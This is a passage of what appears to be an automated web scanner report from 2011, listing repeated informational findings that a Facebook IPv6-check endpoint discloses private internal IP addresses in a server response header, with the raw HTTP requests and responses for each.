10.54.218.26

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.218.26
X-Cnection: close
Date: Thu, 16 Jun 2011 17:35:36 GMT

/*1308245736,171366938*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.204. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.8.101

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f82028f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3774078cc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.8.101
X-Cnection: close
Date: Thu, 16 Jun 2011 17:45:58 GMT

/*1308246358,176687205*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.205. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.160.60

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb5c3e2ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff350bfd74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.160.60
X-Cnection: close
Date: Thu, 16 Jun 2011 15:36:41 GMT

/*1308238601,171876412*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.206. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.240.31

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.42.240.31
X-Cnection: close
Date: Thu, 16 Jun 2011 13:06:49 GMT

/*1308229609,170586143*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.207. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.151.40

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.151.40
X-Cnection: close
Date: Thu, 16 Jun 2011 13:12:05 GMT

/*1308229925,171874088*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.208. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.152.45

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.152.45
X-Cnection: close
Date: Thu, 16 Jun 2011 18:48:04 GMT

/*1308250084,171350061*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.209. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.123.62

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdd5cdee%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3575fe8e%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.123.62
X-Cnection: close
Date: Thu, 16 Jun 2011 15:00:32 GMT

/*1308236432,171866942*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.210. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.86.45

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.86.45
X-Cnection: close
Date: Thu, 16 Jun 2011 12:46:08 GMT

/*1308228368,171333165*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.211. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.15.33

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df398326d08%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.15.33
X-Cnection: close
Date: Thu, 16 Jun 2011 13:01:41 GMT

/*1308229301,171314977*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.212. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.224.115

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.36.224.115
X-Cnection: close
Date: Thu, 16 Jun 2011 14:39:50 GMT

/*1308235190,170188915*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.213. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.175.107

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1850dd0e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff15c9a2904%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.175.107
X-Cnection: close
Date: Thu, 16 Jun 2011 12:30:54 GMT

/*1308227454,169914219*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.214. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.85.46

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2397668d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.85.46
X-Cnection: close
Date: Thu, 16 Jun 2011 15:21:12 GMT

/*1308237672,171332910*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.215. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.128.44

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.128.44
X-Cnection: close
Date: Thu, 16 Jun 2011 19:03:45 GMT

/*1308251025,171343916*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.216. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.171.53

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.171.53
X-Cnection: close
Date: Thu, 16 Jun 2011 15:31:30 GMT

/*1308238290,171354933*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.217. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.108.60

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.108.60
X-Cnection: close
Date: Thu, 16 Jun 2011 17:40:45 GMT

/*1308246045,171338812*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.218. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.24.44

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17499c92c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.24.44
X-Cnection: close
Date: Thu, 16 Jun 2011 14:50:13 GMT

/*1308235813,171841580*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.219. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.198.125

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.198.125
X-Cnection: close
Date: Thu, 16 Jun 2011 13:42:59 GMT

/*1308231779,176735869*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.220. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.122.45

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3fc8ffa4c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2e1211308%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.122.45
X-Cnection: close
Date: Thu, 16 Jun 2011 14:29:32 GMT

/*1308234572,171342381*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.221. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.145.58

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd58836c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d9bc292c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.145.58
X-Cnection: close
Date: Thu, 16 Jun 2011 15:31:35 GMT

/*1308238295,171348282*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.222. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.103.71

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.42.103.71
X-Cnection: close
Date: Thu, 16 Jun 2011 15:10:50 GMT

/*1308237050,170551111*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.223. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.79.40

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df283f04cd%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa0ab181%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.79.40
X-Cnection: close
Date: Thu, 16 Jun 2011 18:06:47 GMT

/*1308247607,171855656*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.224. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.194.52

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29b2230e8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.194.52
X-Cnection: close
Date: Thu, 16 Jun 2011 13:37:53 GMT

/*1308231473,171360820*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.225. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.195.37

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.195.37
X-Cnection: close
Date: Thu, 16 Jun 2011 14:19:10 GMT

/*1308233950,171361061*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.226. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.119.65

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bcdaa0cc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
